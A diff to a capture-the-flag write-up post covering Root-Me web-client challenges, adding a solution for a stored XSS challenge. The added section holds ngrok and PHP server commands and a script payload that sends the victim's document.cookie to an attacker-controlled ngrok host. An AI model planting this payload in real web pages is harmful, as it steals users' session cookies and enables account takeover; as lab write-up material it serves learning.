--- a/_posts/rootme/web-client/2022-04-11-medium.md
+++ b/_posts/rootme/web-client/2022-04-11-medium.md
@@ -8,4 +8,18 @@ permalink: /rootme/web-client/medium
 ---
 
 # Javascript - Obfuscation 3
+
 Decode the string from hex and from decimal.
+
+# XSS - Stored 1
+
+In the machine:
+```console
+$ ngrok http 80
+$ php -S localhost:80
+```
+
+In the web, the following payload:
+```
+<script>document.write('<img src="https://{ngrok-ip}/?cookie='+document.cookie+'" />')</script>
+```
